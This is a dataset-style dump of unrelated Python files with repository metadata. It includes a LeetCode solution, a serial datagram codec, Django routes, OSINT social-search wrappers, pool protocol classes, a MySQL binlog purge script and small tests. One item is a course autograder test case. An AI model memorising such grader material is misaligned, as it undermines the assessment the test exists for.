] | er.ishant@gmail.com |
ccd38499deb46018021dc170d1176876dd50b27e | 9f3488ddfdb02165f1be9a3ce3a4a3468af0e793 | /leetcode/273.integer-to-english-words.py | ca6936b235ba2fbf36945ffa81071a42077ea446 | [] | no_license | szr22/algorithm | b76646799272b81ea6dd179f0d07dba64d9b10d2 | bcf18a6583303dbd5a10776d2c70181b0733defb | refs/heads/master | 2022-05-13T13:59:27.471727 | 2022-04-15T18:27:55 | 2022-04-15T18:27:55 | 190,107,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | #
# @lc app=leetcode id=273 lang=python3
#
# [273] Integer to English Words
#
# @lc code=start
class Solution:
def __init__(self):
self.dictLessTwenty = ["", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine", "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"]
self.dictTens = ["", "", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety"]
self.dictMoreHundred = ["Thousand", "Million", "Billion"]
def numberToWords(self, num: int) -> str:
res = self.numberToHundred(num%1000)
for i in range(3):
num //= 1000
if num % 1000 == 0:
res
else:
res = self.numberToHundred(num % 1000) + ' ' + self.dictMoreHundred[i] + ' ' + res
while res and res[-1] == ' ':
res = res[:-1]
if not res:
return 'Zero'
else:
return res
def numberToHundred(self, num: int) -> str:
res = ''
hundredNum = num // 100
hundredRemainderNum = num % 100
tenRemainderNum = num % 10
if hundredRemainderNum<20:
res = self.dictLessTwenty[hundredRemainderNum]
else:
res = self.dictTens[hundredRemainderNum//10]
if tenRemainderNum > 0:
res += ' ' + self.dictLessTwenty[tenRemainderNum]
if hundredNum>0:
if hundredRemainderNum>0:
res = ' ' + res
res = self.dictLessTwenty[hundredNum] + ' Hundred' + res
return res
# @lc code=end
num = 1234567891
num = 1051
res = Solution().numberToWords(num)
print(res) | [
"shizhenrong1987@hotmail.com"
] | shizhenrong1987@hotmail.com |
e889548a187ca2c0ffa106a9c7a66ec640690c87 | ab8a1749aa2b1ad5f5d6fde4ad83702b306c9946 | /bowler/_bowlerv3.py | 1feb828fe6c62dbfc524677718fea104647aa980 | [] | no_license | Auzzy/python-dyio | ae85fdf5cdf17c59f6923e0a7c3eccd97bdddc3a | 60ccc8b311ff23f897b102524fd5ebdf847a4b3a | refs/heads/master | 2016-09-01T09:26:24.517331 | 2013-03-10T21:36:29 | 2013-03-10T21:36:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | from bowler import _DatagramBuilder,_DatagramParser
LENGTH = 11
class Affect(object):
STATUS = 0x00
GET = 0x10
POST = 0x20
CRIT = 0x30
ASYNC = 0x40
class _Builder(_DatagramBuilder):
@staticmethod
def build(mac, func, args, affect, ns):
mac = mac.replace(':',' ')
payload = _Builder._build_payload(func,args)
header = _Builder._build_header(mac,affect,ns,len(payload))
return header + payload
@staticmethod
def _build_header(mac, affect, ns, payload_size):
header = bytearray()
header.append(0x3)
header.extend(bytearray.fromhex(mac))
header.append(affect)
header.append((ns << 1) | 0)
header.append(payload_size)
header.append(sum(header) & 0x000000FF)
return header
@staticmethod
def _build_payload(func, args):
func_bytes = bytearray(4-len(func)) + bytearray(func,"hex")
arg_bytes = _Builder.args_to_bytes(args)
return func_bytes + arg_bytes
class _Parser(_DatagramParser):
@staticmethod
def parse(port, header):
affect,dir,length = _Parser._parse_header(header)
func = bytearray(port.read(length))
if not func:
raise SerialTimeoutException("A timeout occurred while reading an incoming packet.")
name,args = _Parser._parse_func(func)
return name,args,affect,dir
@staticmethod
def _parse_header(header):
mac = header[1:7]
affect = header[7]
ns = header[8] >> 1
dir = header[8] & 0x1
length = header[9]
checksum = header[10]
data_checksum = sum(header[:10]) & 0x000000FF
if checksum!=data_checksum:
raise IOError("The received data was corrupted.")
return affect,dir,length
@staticmethod
def _parse_func(func):
return func[:4],func[4:]
def _get_affect(priority, state, async):
if priority==0:
return Affect.CRIT
elif state:
return Affect.POST
elif async:
return Affect.ASYNC
else:
return Affect.GET
def _unpack_affect(affect):
if affect==Affect.CRIT:
return 0,False,False
elif affect==Affect.POST:
return 32,True,False
elif affect==Affect.ASYNC:
return 32,False,True
else:
return 32,False,False
def build(mac, func, args=[], priority=32, state=False, async=False, encrypted=False, ns=0x0):
affect = _get_affect(priority,state,async)
return _Builder.build(mac,func,args,affect,ns)
# RETURN: func, args, priority, state, async, dir, encrypted
def parse(port, header):
func,args,affect,dir = _Parser.parse(port,header)
priority,state,async = _unpack_affect(affect)
return func,args,priority,state,async,dir,False
| [
"metalnut4@netscape.net"
] | metalnut4@netscape.net |
f39f248f0bbe9ef7481745246946d51ff52cf137 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_Quantization/trend_Lag1Trend/cycle_7/ar_12/test_artificial_32_Quantization_Lag1Trend_7_12_20.py | 8aab6db49f32f6e1b077dd49b45246fcd79cf007 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 272 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 7, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12); | [
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
9c5539d8a3f55ac77c8088a89e80ba26627d0880 | 4751fd86184b64316d694a98671d34faae76ffe6 | /plannerrr/urls.py | 5440d164eca08d316b10eec4f88ad184fb5b72d6 | [] | no_license | mohammedaliyu136/dg_planner | 8a6a4888cc109d6c3a1cb115494a1e6decbb864a | a0fb87e182527e541e7758a2c4720ddbb2438145 | refs/heads/master | 2020-04-03T08:09:02.020426 | 2018-10-29T19:57:16 | 2018-10-29T19:57:16 | 155,124,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | from plannerrr import views
from django.conf.urls import include, url
from django.contrib import admin
from plannerrr.advisor.views import edit_default_plan
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^login/', views.login_user, name='login'),
url(r'^login_out/', views.logout_user, name='login'),
url(r'^profile/', views.profile, name='profile'),
url(r'^register/', views.register, name='register'),
url(r'^enroll_profile/', views.enroll_profile, name='profile'),
url(r'^indexx/', views.indexx, name='get_info'),
url(r'^degree_req/', views.degree_req, name='free_elective_req'),
url(r'^my_view/', views.my_view, name='my_view'),
url(r'^show_schedule/', views.show_schedule, name='planner'),
url(r'^search/', views.search, name='search'),
url(r'^student/(?P<pk>\d+)$', views.search_click, name='student'),
url(r'^students/$', views.search, name='students'),
url(r'^team/$', views.team, name='team'),
url(r'^plan/edit/$', views.edit_plan, name='team'),
url(r'^plan/generated/pdf/$', views.generate_pdf, name='pdf'),
url(r'^dashboard/', views.dashboard, name='dashboard'),
url(r'^getcourse/', views.get_course, name='get_course'),
]
| [
"mohammedaliyu136@gmail.com"
] | mohammedaliyu136@gmail.com |
a7116d737ea16e7b0521b8c9990f276ce7f27c42 | d0bdf444c71b724ecfd59b5bc6850962c56494cb | /homeworks/02-arrays_tables/tests/q2_2.py | b338149a2d1c1e8bf6590df93b420ef2042ceb53 | [] | no_license | ucsd-ets/dsc10-su20-public | 10e3d0ff452b337f222baee330fe60d1465b0071 | 38787e6cc3e6210b4cc8a46350e5120845971c9f | refs/heads/master | 2022-12-13T23:28:20.512649 | 2020-09-03T19:28:06 | 2020-09-03T19:28:06 | 275,905,339 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | test = {
'name': 'Question 2_2',
'hidden': False,
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> isinstance( new_allowances_constant , np.ndarray)
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"eldridgejm@gmail.com"
] | eldridgejm@gmail.com |
3c2ffe9176682d22fb8791c366db0d1b969071f8 | f7deae8209a3ff66050780d5e59c8f2231f8139f | /profil3r/app/core/services/_social.py | a5abb6c74a823594b669110e37afced5602f1873 | [
"MIT"
] | permissive | cyber-workforce/Profil3r | 858b6ce3ad71bb4cf5d621a6bd18023d50538968 | ec308924850e0514416aaeaa9e96eabf658e2d0e | refs/heads/main | 2023-06-17T04:07:57.303282 | 2021-07-12T12:51:03 | 2021-07-12T12:51:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,041 | py | from profil3r.app.modules.social.facebook import Facebook
from profil3r.app.modules.social.twitter import Twitter
from profil3r.app.modules.social.tiktok import TikTok
from profil3r.app.modules.social.instagram import Instagram
from profil3r.app.modules.social.pinterest import Pinterest
from profil3r.app.modules.social.linktree import LinkTree
from profil3r.app.modules.social.myspace import MySpace
from profil3r.app.modules.social.flickr import Flickr
from profil3r.app.modules.social.goodread import GoodRead
# Facebook
def facebook(self):
self.result["facebook"] = Facebook(self.config, self.permutations_list).search()
# print results
self.print_results("facebook")
# Twitter
def twitter(self):
self.result["twitter"] = Twitter(self.config, self.permutations_list).search()
# print results
self.print_results("twitter")
# TikTok
def tiktok(self):
self.result["tiktok"] = TikTok(self.config, self.permutations_list).search()
# print results
self.print_results("tiktok")
# Instagram
def instagram(self):
self.result["instagram"] = Instagram(self.config, self.permutations_list).search()
# print results
self.print_results("instagram")
# Pinterest
def pinterest(self):
self.result["pinterest"] = Pinterest(self.config, self.permutations_list).search()
# print results
self.print_results("pinterest")
# LinkTree
def linktree(self):
self.result["linktree"] = LinkTree(self.config, self.permutations_list).search()
# print results
self.print_results("linktree")
# MySpace
def myspace(self):
self.result["myspace"] = MySpace(self.config, self.permutations_list).search()
# print results
self.print_results("myspace")
# Flickr
def flickr(self):
self.result["flickr"] = Flickr(self.config, self.permutations_list).search()
# print results
self.print_results("flickr")
# GoodRead
def goodread(self):
self.result["goodread"] = GoodRead(self.config, self.permutations_list).search()
# print results
self.print_results("goodread") | [
"r0g3r5@protonmail.com"
] | r0g3r5@protonmail.com |
91b6bd20ba16539afdb282384848c0db31a11601 | 111cac4319ff247d890926ddda4809a7ca6e6f25 | /ch02/02.py | edc962b02e51c769360fa1e35669d95871ace916 | [] | no_license | gebijiaxiaowang/FluentPython | c5c9838209524cbab0036f22ef6b75085b8ead53 | 700427ee872cd4c2a4b6466f7a214b7acc679580 | refs/heads/master | 2023-03-02T21:20:06.224311 | 2021-02-09T08:58:42 | 2021-02-09T08:58:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | #!/usr/bin/python3.7
# -*- coding: utf-8 -*-
# @Time : 2020/12/31 15:25
# @Author : dly
# @File : 02.py
# @Desc :
import os
from collections import namedtuple
lax_coordinates = (33.9, -118.4)
# 元组拆包
latitude, longitude = lax_coordinates
print(latitude)
print(longitude)
# divmod(x, y)
# Return the tuple (x//y, x%y).
print(divmod(20, 8))
# 拆分路径和文件名
print(os.path.split('/home/python/test.py'))
# ('/home/python', 'test.py')
# 用 * 来处理剩下的元素
a, b, *c = range(5)
print(a, b, c)
# 具名元组
City = namedtuple('City', 'name country population coordinates')
# 字段
print(City._fields)
tokyo = City('Tokyo', 'JP', 36.9, (35.6, 239.6))
print(tokyo)
print(tokyo.population)
print(tokyo.coordinates)
# 转字典
print(tokyo._asdict())
# 切片赋值
l = list(range(10))
print(l)
l[2:5] = [20, 30]
print(l)
l[2:5] = [100]
print(l)
# 对序列使用 + 和 *
board = [['_'] * 3 for i in range(3)]
print(board)
board[1][2] = 'x'
print(board)
# 三个列表指向同一对象的引用
board = [['_'] * 3] * 3
print(board)
board[1][2] = '0'
print(board)
# +=
t = (1, 2, [30, 40])
t[2] += [50, 60]
print(t)
| [
"1083404373@qq.com"
] | 1083404373@qq.com |
ff4a5fc06618705dfc56f7d5407354cef5cb04bd | d943d1b6803bb3c44b3600a2b3728662d4a3de06 | /btcgreen/protocols/pool_protocol.py | 8156b5f25f7f6e48ecf3d376e3bbe60cd68eaabe | [
"Apache-2.0"
] | permissive | onuratakan/btcgreen-blockchain | 624575e3f484dcbb70dbbbfab46f7eeb92a5b709 | 03c9e27c483a0c3e6a34713dd9d2502eff7c25b2 | refs/heads/main | 2023-09-06T04:31:12.725344 | 2021-10-16T23:45:51 | 2021-10-16T23:45:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,027 | py | from dataclasses import dataclass
from enum import Enum
import time
from typing import Optional
from blspy import G1Element, G2Element
from btcgreen.types.blockchain_format.proof_of_space import ProofOfSpace
from btcgreen.types.blockchain_format.sized_bytes import bytes32
from btcgreen.util.ints import uint8, uint16, uint32, uint64
from btcgreen.util.streamable import Streamable, streamable
POOL_PROTOCOL_VERSION = uint8(1)
class PoolErrorCode(Enum):
REVERTED_SIGNAGE_POINT = 1
TOO_LATE = 2
NOT_FOUND = 3
INVALID_PROOF = 4
PROOF_NOT_GOOD_ENOUGH = 5
INVALID_DIFFICULTY = 6
INVALID_SIGNATURE = 7
SERVER_EXCEPTION = 8
INVALID_P2_SINGLETON_PUZZLE_HASH = 9
FARMER_NOT_KNOWN = 10
FARMER_ALREADY_KNOWN = 11
INVALID_AUTHENTICATION_TOKEN = 12
INVALID_PAYOUT_INSTRUCTIONS = 13
INVALID_SINGLETON = 14
DELAY_TIME_TOO_SHORT = 15
REQUEST_FAILED = 16
# Used to verify GET /farmer and GET /login
@dataclass(frozen=True)
@streamable
class AuthenticationPayload(Streamable):
method_name: str
launcher_id: bytes32
target_puzzle_hash: bytes32
authentication_token: uint64
# GET /pool_info
@dataclass(frozen=True)
@streamable
class GetPoolInfoResponse(Streamable):
name: str
logo_url: str
minimum_difficulty: uint64
relative_lock_height: uint32
protocol_version: uint8
fee: str
description: str
target_puzzle_hash: bytes32
authentication_token_timeout: uint8
# POST /partial
@dataclass(frozen=True)
@streamable
class PostPartialPayload(Streamable):
launcher_id: bytes32
authentication_token: uint64
proof_of_space: ProofOfSpace
sp_hash: bytes32
end_of_sub_slot: bool
harvester_id: bytes32
@dataclass(frozen=True)
@streamable
class PostPartialRequest(Streamable):
payload: PostPartialPayload
aggregate_signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PostPartialResponse(Streamable):
new_difficulty: uint64
# GET /farmer
# Response in success case
@dataclass(frozen=True)
@streamable
class GetFarmerResponse(Streamable):
authentication_public_key: G1Element
payout_instructions: str
current_difficulty: uint64
current_points: uint64
# POST /farmer
@dataclass(frozen=True)
@streamable
class PostFarmerPayload(Streamable):
launcher_id: bytes32
authentication_token: uint64
authentication_public_key: G1Element
payout_instructions: str
suggested_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class PostFarmerRequest(Streamable):
payload: PostFarmerPayload
signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PostFarmerResponse(Streamable):
welcome_message: str
# PUT /farmer
@dataclass(frozen=True)
@streamable
class PutFarmerPayload(Streamable):
launcher_id: bytes32
authentication_token: uint64
authentication_public_key: Optional[G1Element]
payout_instructions: Optional[str]
suggested_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class PutFarmerRequest(Streamable):
payload: PutFarmerPayload
signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PutFarmerResponse(Streamable):
authentication_public_key: Optional[bool]
payout_instructions: Optional[bool]
suggested_difficulty: Optional[bool]
# Misc
# Response in error case for all endpoints of the pool protocol
@dataclass(frozen=True)
@streamable
class ErrorResponse(Streamable):
error_code: uint16
error_message: Optional[str]
# Get the current authentication toke according "Farmer authentication" in SPECIFICATION.md
def get_current_authentication_token(timeout: uint8) -> uint64:
return uint64(int(int(time.time() / 60) / timeout))
# Validate a given authentication token against our local time
def validate_authentication_token(token: uint64, timeout: uint8):
return abs(token - get_current_authentication_token(timeout)) <= timeout
| [
"svginsomnia@gmail.com"
] | svginsomnia@gmail.com |
3e95aaa34291786d7b1e43802787d3b150378db0 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayCommerceEducateTuitioncodePlanDisburseResponse.py | b68b5df3dd899650dcb85ee7430d2c745ecd58df | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 497 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceEducateTuitioncodePlanDisburseResponse(AlipayResponse):
def __init__(self):
super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).__init__()
def parse_response_content(self, response_content):
response = super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).parse_response_content(response_content)
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
0189a50f15557b57e5dd47c6ad38deada72bbd5f | 08e6b46769aa36da479f29ef345bdb15e5d0d102 | /admin_mysql_purge_binlog.py | 3cd6ca5344c7563aad947373aba1ea153792b032 | [] | no_license | speedocjx/lepus_python | 30a33852efdef5b24402cbe81b8d9798072f9309 | 27d61c154d4cde97e004e3851203420f77a63c5d | refs/heads/master | 2021-06-14T22:37:50.936419 | 2017-03-21T06:18:12 | 2017-03-21T06:18:12 | 70,157,618 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,114 | py | #!//bin/env python
#coding:utf-8
import os
import sys
import string
import time
import datetime
import MySQLdb
path='.\include'
sys.path.insert(0,path)
import functions as func
from multiprocessing import Process;
def admin_mysql_purge_binlog(host,port,user,passwd,binlog_store_days):
datalist=[]
try:
connect=MySQLdb.connect(host=host,user=user,passwd=passwd,port=int(port),connect_timeout=2,charset='utf8')
cur=connect.cursor()
connect.select_db('information_schema')
master_thread=cur.execute("select * from information_schema.processlist where COMMAND = 'Binlog Dump';")
datalist=[]
if master_thread >= 1:
now=datetime.datetime.now()
delta=datetime.timedelta(days=binlog_store_days)
n_days=now-delta
before_n_days= n_days.strftime('%Y-%m-%d %H:%M:%S')
cur.execute("purge binary logs before '%s'" %(before_n_days));
print ("mysql %s:%s binlog been purge" %(host,port) )
except MySQLdb.Error,e:
pass
print "Mysql Error %d: %s" %(e.args[0],e.args[1])
def main():
user = func.get_config('mysql_db','username')
passwd = func.get_config('mysql_db','password')
servers=func.mysql_query("select host,port,binlog_store_days from db_servers_mysql where is_delete=0 and monitor=1 and binlog_auto_purge=1;")
if servers:
print("%s: admin mysql purge binlog controller started." % (time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()),));
plist = []
for row in servers:
host=row[0]
port=row[1]
binlog_store_days=row[2]
p = Process(target = admin_mysql_purge_binlog, args = (host,port,user,passwd,binlog_store_days))
plist.append(p)
for p in plist:
p.start()
time.sleep(60)
for p in plist:
p.terminate()
for p in plist:
p.join()
print("%s: admin mysql purge binlog controller finished." % (time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()),))
if __name__=='__main__':
main()
| [
"changjingxiu1@163.com"
] | changjingxiu1@163.com |
76428ce31dbddb8a14d11a3a0fa372bea28b6157 | 9b422078f4ae22fe16610f2ebc54b8c7d905ccad | /xlsxwriter/test/comparison/test_chart_doughnut01.py | 7048957c7e5110ea5f6179445573456bacf51b58 | [
"BSD-2-Clause-Views"
] | permissive | projectsmahendra/XlsxWriter | 73d8c73ea648a911deea63cb46b9069fb4116b60 | 9b9d6fb283c89af8b6c89ad20f72b8208c2aeb45 | refs/heads/master | 2023-07-21T19:40:41.103336 | 2023-07-08T16:54:37 | 2023-07-08T16:54:37 | 353,636,960 | 0 | 0 | NOASSERTION | 2021-04-01T08:57:21 | 2021-04-01T08:57:20 | null | UTF-8 | Python | false | false | 1,121 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2021, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparison_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.set_filename('chart_doughnut01.xlsx')
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
chart = workbook.add_chart({'type': 'doughnut'})
data = [
[2, 4, 6],
[60, 30, 10],
]
worksheet.write_column('A1', data[0])
worksheet.write_column('B1', data[1])
chart.add_series({
'categories': '=Sheet1!$A$1:$A$3',
'values': '=Sheet1!$B$1:$B$3',
})
worksheet.insert_chart('E9', chart)
workbook.close()
self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
ad358bf4d32aea80191fa3241fe832f390353029 | 41311e8bbed80e1f819157d24d7943c05ba6b2e6 | /ProblemSet1/loadWords/loadWords.py | 3a94e083edcd22587507bf4aeaa2b961c0adee1b | [] | no_license | tanglan2009/MITx6.00.2x_Introductin_Computational_Thinking_and_Data_Science | c0bb39cb0964014661823e1301f05af7837ff3c5 | 334726fca7f87eae55f5f45c3cdc4dbac02cfac4 | refs/heads/master | 2021-01-10T02:49:34.663406 | 2016-03-06T19:49:44 | 2016-03-06T19:49:44 | 53,272,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 767 | py | import string
PATH_TO_FILE = 'words.txt'
def loadWords():
inFile = open(PATH_TO_FILE, 'r', 0)
line = inFile.readline()
wordlist = string.split(line)
print " ", len(wordlist), "words loaded."
return wordlist
loadWords()
# Uncomment the following function if you want to try the code template
def loadWords2():
try:
inFile = open(PATH_TO_FILE, 'r', 0)
#line of code to be added here#
except:
print "The wordlist doesn't exist; using some fruits for now"
return ['apple', 'orange', 'pear', 'lime', 'lemon', 'grape', 'pineapple']
line = inFile.readline()
wordlist = string.split(line)
print " ", len(wordlist), "words loaded."
return wordlist
PATH_TO_FILE = 'words2.txt'
loadWords2()
PATH_TO_FILE = 'doesntExist.txt'
loadWords2()
| [
"tanglan2009@gmail.com"
] | tanglan2009@gmail.com |
e728f33e5d0da7256dab52088914b8554fcfb53b | 2fb0af0a30e3133ef4c5e649acd3f9911430062c | /src/otp/level/ZoneEntity.py | dd4b697f834eeffe4a6e4330b73a50fe508dda0f | [] | no_license | Teku16/Toontown-Crystal-Master | 4c01c0515f34a0e133441d2d1e9f9156ac267696 | 77a9345d52caa350ee0b1c7ad2b7461a3d6ed830 | refs/heads/master | 2020-05-20T06:02:58.106504 | 2015-07-25T07:23:59 | 2015-07-25T07:23:59 | 41,053,558 | 0 | 1 | null | 2015-08-19T18:51:11 | 2015-08-19T18:51:11 | null | UTF-8 | Python | false | false | 1,244 | py | import ZoneEntityBase
import BasicEntities
class ZoneEntity(ZoneEntityBase.ZoneEntityBase, BasicEntities.NodePathAttribs):
def __init__(self, level, entId):
ZoneEntityBase.ZoneEntityBase.__init__(self, level, entId)
self.nodePath = self.level.getZoneNode(self.entId)
if self.nodePath is None:
self.notify.error('zone %s not found in level model' % self.entId)
BasicEntities.NodePathAttribs.initNodePathAttribs(self, doReparent=0)
self.visibleZoneNums = {}
self.incrementRefCounts(self.visibility)
def destroy(self):
BasicEntities.NodePathAttribs.destroy(self)
ZoneEntityBase.ZoneEntityBase.destroy(self)
def getNodePath(self):
return self.nodePath
def getVisibleZoneNums(self):
return self.visibleZoneNums.keys()
def incrementRefCounts(self, zoneNumList):
for zoneNum in zoneNumList:
self.visibleZoneNums.setdefault(zoneNum, 0)
self.visibleZoneNums[zoneNum] += 1
def decrementRefCounts(self, zoneNumList):
for zoneNum in zoneNumList:
self.visibleZoneNums[zoneNum] -= 1
if self.visibleZoneNums[zoneNum] == 0:
del self.visibleZoneNums[zoneNum] | [
"vincentandrea15k@gmail.com"
] | vincentandrea15k@gmail.com |
cf1f4af51afa41b4dec936aee3e234c05d0c1381 | fbf8bbc67ee98632531bb79b0353b536427d7572 | /variables_and_scope/exe1_function.py | 6687c59c3573e3f5e48fd39f5c3f3b5cafce1c0a | [] | no_license | bartoszmaleta/3rd-Self-instructed-week | c0eea57a8b077d91fe09fe53c1109d3a79e3f37c | 4d00306e64ba2f7c2dd8213fd776ce8d3da142fc | refs/heads/master | 2020-08-20T22:31:17.675733 | 2019-10-28T12:24:22 | 2019-10-28T12:24:22 | 216,073,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | def my_funcion(a):
b = a - 2
# print(b)
return b
c = 1
if c > 2:
d = my_funcion(5)
print(d)
# my_funcion(5)
| [
"bartosz.maleta@gmail.com"
] | bartosz.maleta@gmail.com |
6c365f68c5d1ed3c3e601bb023af3f91a5b78b92 | 14b44aa2b73fb3df08c9c085219ebfd320d5d63a | /register_service/venv/bin/jp.py | be778c22379e6ca2900eb32e774e96139bfddb56 | [] | no_license | sande2jm/CI-CD-Service | c46f95f380872e9aca02d5c5e5a88578ba6e88b0 | 34535e69a3c39a78cd1d1ca785587d5e78a03580 | refs/heads/master | 2020-03-27T02:16:00.843764 | 2018-08-25T00:28:32 | 2018-08-25T00:28:32 | 145,778,079 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,714 | py | #!/Users/jacob/Desktop/_ML/CI-CD-Service/venv/bin/python3
import sys
import json
import argparse
from pprint import pformat
import jmespath
from jmespath import exceptions
def main():
parser = argparse.ArgumentParser()
parser.add_argument('expression')
parser.add_argument('-f', '--filename',
help=('The filename containing the input data. '
'If a filename is not given then data is '
'read from stdin.'))
parser.add_argument('--ast', action='store_true',
help=('Pretty print the AST, do not search the data.'))
args = parser.parse_args()
expression = args.expression
if args.ast:
# Only print the AST
expression = jmespath.compile(args.expression)
sys.stdout.write(pformat(expression.parsed))
sys.stdout.write('\n')
return 0
if args.filename:
with open(args.filename, 'r') as f:
data = json.load(f)
else:
data = sys.stdin.read()
data = json.loads(data)
try:
sys.stdout.write(json.dumps(
jmespath.search(expression, data), indent=4))
sys.stdout.write('\n')
except exceptions.ArityError as e:
sys.stderr.write("invalid-arity: %s\n" % e)
return 1
except exceptions.JMESPathTypeError as e:
sys.stderr.write("invalid-type: %s\n" % e)
return 1
except exceptions.UnknownFunctionError as e:
sys.stderr.write("unknown-function: %s\n" % e)
return 1
except exceptions.ParseError as e:
sys.stderr.write("syntax-error: %s\n" % e)
return 1
if __name__ == '__main__':
sys.exit(main())
| [
"sande2jm@gmail.com"
] | sande2jm@gmail.com |
08b8127958744b568e48462f5aed02e97b1ddad2 | 62bbef9472f343adea9804e29f403798434455df | /octaveimp/dictgen.py | 3a9e93641d4d9b0d46bbce71a0195c6000186de2 | [] | no_license | drdhaval2785/SamaasaClassification | d46658abce7ea7d7b6c89522ecc22a9d4391c011 | f71be804d2b6fb0ec370d0917adf1a58079df550 | refs/heads/master | 2020-12-24T08:55:08.230647 | 2016-08-07T09:17:39 | 2016-08-07T09:17:39 | 38,927,628 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,408 | py | # -*- coding: utf-8 -*-
import sys, re
import codecs
import string
import datetime
"""
Usage - python dictgen.py step2.csv step3.csv dict.txt class.txt
Creates a dictionary and index of unique words in step2.csv.
The replacements are stored in step3.csv.
dict.txt file has the dictionary.
class.txt file has unique classes.
"""
# Function to return timestamp
def timestamp():
return datetime.datetime.now()
def readcsv(csvfile):
output = []
for line in open(csvfile):
line = line.strip()
word,micro,macro = line.split(',')
output.append((word,micro,macro))
return output
def writedict(readcsvdata,dictfile):
output = []
diction = codecs.open(dictfile,'w','utf-8')
for (word,micro,macro) in readcsvdata:
output += word.split('-')
output = list(set(output))
diction.write('\n'.join(output))
diction.close()
def findindex(word,diction):
lendict = xrange(len(diction))
for i in lendict:
line = diction[i].strip()
if word == line:
return i
else:
return 0
def repdict(readcsvdata,step3file,dictfile,classfile):
step3 = codecs.open(step3file,'w','utf-8')
diction = codecs.open(dictfile,'r','utf-8').readlines()
log = codecs.open('log.txt','a','utf-8')
log.write('==========More than two parts in compound==========\n')
counter = 0
classtypes = []
for (word,micro,macro) in readcsvdata:
classtypes.append(macro)
classfout = codecs.open(classfile,'w','utf-8')
classtypes = list(set(classtypes))
classfout.write('\n'.join(classtypes))
classfout.close()
for (word,micro,macro) in readcsvdata:
wordsplit = word.split('-')
if len(wordsplit) == 2:
counter += 1
word1, word2 = word.split('-')
ind1 = findindex(word1,diction)
ind2 = findindex(word2,diction)
classrep = classtypes.index(macro)
step3.write(str(ind1)+','+str(ind2)+','+str(classrep)+'\n')
if counter % 100 == 0:
print counter
else:
log.write(word+','+micro+','+macro+'\n')
log.close()
step3.close()
if __name__=="__main__":
fin = sys.argv[1]
fout = sys.argv[2]
dictfile = sys.argv[3]
classfile = sys.argv[4]
readcsvdata = readcsv(fin)
print len(readcsvdata), "entries in step2.csv"
writedict(readcsvdata,dictfile)
repdict(readcsvdata,fout,dictfile,classfile)
step3data = codecs.open(fout,'r','utf-8').readlines()
print len(step3data), "entries in step3.csv"
classtypes = codecs.open(classfile,'r','utf-8').readlines()
print len(classtypes), "types of class in data" | [
"drdhaval2785@gmail.com"
] | drdhaval2785@gmail.com |
